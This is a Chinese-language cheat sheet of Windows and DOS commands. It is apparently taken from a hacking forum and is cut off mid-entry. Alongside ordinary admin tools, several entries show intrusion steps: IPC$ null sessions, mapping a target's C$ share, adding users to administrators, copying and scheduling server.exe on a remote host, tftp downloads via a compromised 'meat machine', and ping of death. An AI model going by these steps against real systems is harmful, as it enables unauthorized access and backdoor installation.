rundll32.exe 启动32位DLL程序

rwinsta.exe 重置会话子系统硬件和软件到最初的值

Sndvol32 音量控制程序

sfc.exe 或CMD\ sfc.exe 回车 系统文件检查器

services.msc 网络连接服务

syskey 系统加密，(一旦加密就不能解开，保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)

SCANREG/RESTORE 命令恢复最近的注册表

secedit.exe 自动化安全性配置管理

services.exe 控制所有服务

sethc.exe 设置高对比

setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号

sfc.exe 系统文件检查

shadow.exe 监控另外一台中端服务器会话

shrpubw.exe 建立和共享文件夹

sigverif.exe 文件签名验证

smlogsvc.exe 性能日志和警报 (XP不可用)

sndrec32.exe 录音机

sndvol32.exe 显示声音控制信息

snmp.exe 简单网络管理协议 (XP不可用)

snmptrap.exe SNMP工具 (XP不可用)

srvmgr.exe 服务器管理器 (XP不可用)

subst.exe 将路径与驱动器盘符关联

sysedit.exe 系统配置编辑器

syskey.exe NT账号数据库加密工具

sysocmgr.exe Windows 安装程序

systray.exe 在低权限运行systray

taskmgr 任务管理器

tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)

tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(

taskman.exe 任务管理器 (XP不可用)

taskmgr.exe 任务管理器

tcmsetup.exe 电话服务客户安装

tcpsvcs.exe TCP服务

termsrv.exe 终端服务

tftp.exe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件

themes.exe 桌面主题 (XP不可用)

tlntadmn.exe Administrator Telnet服务管理

tlntsess.exe 显示目前的Telnet会话

tlntsvr.exe 开始Telnet服务

tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标，以决定到达目标采用的

启动项。并可设置是否故障启动。

开始,运行,输入Regedit 注册表修改工具注册表编辑器，如果没有把握不要随意修改注册表！

开始,运行,输入Regsvr32 dll注册工具当提示找不到dll文件时，可用此来注册该动态连接库。

开始,运行,输入Regwiz 注册向导用于注册。校验系统文件，并可恢复系统文件。

如果启动时出现类似*.vxd文件错误，可用此恢复该vxd文件。

开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误，可用来初步修复。

开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。

开始,运行,输入NETSCAPE

ESC：清除当前命令行；

F7：显示命令历史记录，以图形列表窗的形式给出所有曾经输入的命令，并可用上下箭头键选择再次执行该命令。

F8：搜索命令的历史记录，循环显示所有曾经输入的命令，直到按下回车键为止；

F9：按编号选择命令，以图形对话框方式要求您输入命令所对应的编号(从0开始)，并将该命令显示在屏幕上；

Ctrl+H：删除光标左边的一个字符；

Ctrl+C Ctrl+Break，强行中止命令执行；

Ctrl+M：表示回车确认键；

Alt+F7：清除所有曾经输入的命令历史记录；

Alt+PrintScreen：截取屏幕上当前命令窗里的内容。

病毒破坏了系统文件，请使用杀毒软件查杀病毒，然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可

DOS命令字典..收藏

net use \ip\ipc$ " " /user:" " 建立IPC空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \ip\c$ 登陆后映射对方C：到本地为H:

net use \ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \目标ip 查看对方时间

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc

net share ipc$ /del 删除ipc

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示

删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除

系统文件以外的所有文件

#2 二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删

除。（二个命令作用相同）

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进

制文件，/a指ASCLL格式文件

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\目录名复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe

参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本

文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p(或其它字?